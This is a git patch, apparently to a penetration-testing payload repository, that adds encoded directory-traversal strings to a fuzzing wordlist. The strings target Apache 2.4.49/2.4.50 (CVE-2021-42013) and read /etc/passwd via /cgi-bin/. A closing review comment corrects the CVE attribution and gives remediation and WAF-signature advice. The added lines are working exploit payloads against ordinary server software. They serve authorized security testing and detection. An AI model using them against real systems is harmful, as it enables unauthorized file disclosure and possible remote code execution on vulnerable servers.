From 7e737baa238edc43c13cad6e3220fe7dd4d7d151 Mon Sep 17 00:00:00 2001
From: Markus
Date: Mon, 11 Oct 2021 10:11:10 +0200
Subject: [PATCH] Update directory traversal wordlist

Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE into Apache 2.4.49/2.4.50). Also add some depth to the current fuzzing payloads to not miss /cgi-bin directories which are located deeper than 4 subdirectories.
---
 Directory Traversal/Intruder/directory_traversal.txt | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Directory Traversal/Intruder/directory_traversal.txt b/Directory Traversal/Intruder/directory_traversal.txt
index aac01f1..a8bece0 100644
--- a/Directory Traversal/Intruder/directory_traversal.txt
+++ b/Directory Traversal/Intruder/directory_traversal.txt
@@ -131,3 +131,10 @@ C:\boot.ini
 ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
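Review bot: The description attributes all seven added entries to CVE-2021-42013, but only the four double-encoded `.%%32%65` lines use the encoding associated with that CVE. The three `.%2e/%2e%2e` lines only deepen the existing single-encoded entry, which as far as I know corresponds to the earlier Apache 2.4.49 traversal that the 2.4.50 fix did not fully close. A plain wordlist has no comment syntax, so this mapping belongs in the accompanying documentation. That documentation should also say what a hit means for remediation: the server is likely running 2.4.49/2.4.50 without `Require all denied` on the filesystem root, and it should be moved to a release later than 2.4.50. For defenders the same two encodings (`/.%2e/` and `%%32%65` in a request path under `/cgi-bin/`) are usable as access-log and WAF signatures.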